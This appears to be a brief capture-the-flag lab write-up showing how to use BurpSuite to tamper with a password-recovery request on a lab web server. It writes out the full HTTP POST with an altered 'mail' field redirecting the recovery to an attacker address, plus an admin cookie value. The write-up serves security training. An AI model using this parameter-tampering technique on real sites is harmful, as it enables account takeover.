with BurpSuite we can change the request send to the server to change the destination mail :

	POST /?page=recover HTTP/1.1
	Host: 192.168.122.55
	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 39
	Origin: http://192.168.122.55
	Connection: close
	Referer: http://192.168.122.55/?page=recover
	Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
	Upgrade-Insecure-Requests: 1

	mail=hacker%40borntosec.com&Submit=Submit
